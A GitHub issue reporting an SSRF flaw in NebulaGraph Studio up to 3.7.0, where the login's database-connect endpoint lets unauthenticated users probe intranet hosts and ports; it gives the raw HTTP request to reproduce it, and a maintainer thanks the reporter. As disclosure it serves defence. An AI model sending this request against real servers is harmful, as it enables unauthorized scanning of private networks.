NebulaGraph Studio has SSRF vulnerability

[godway111]

Describe the bug (must be provided)

The NebulaGraph Studio login interface provides the function of connecting to NebulaGraph. Unauthorized users can request the IP address and port of the intranet host through the target website for intranet detection.

Your Environments (must be provided)

• NebulaGraph Studio ≤ 3.7.0

How To Reproduce(must be provided)

Steps to reproduce the behavior:

Step1. Send request
`POST /api-nebula/db/connect HTTP/1.1
Host: xxxx.com
Content-Length: 47
Accept: application/json, text/plain, /
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"address":"x.x.x.x","port":prot}`

Step2. View Response
The open ports of the intranet server can be seen through the response and status code：

[wey-gu]

Thanks a lot, @godway111 for reporting this!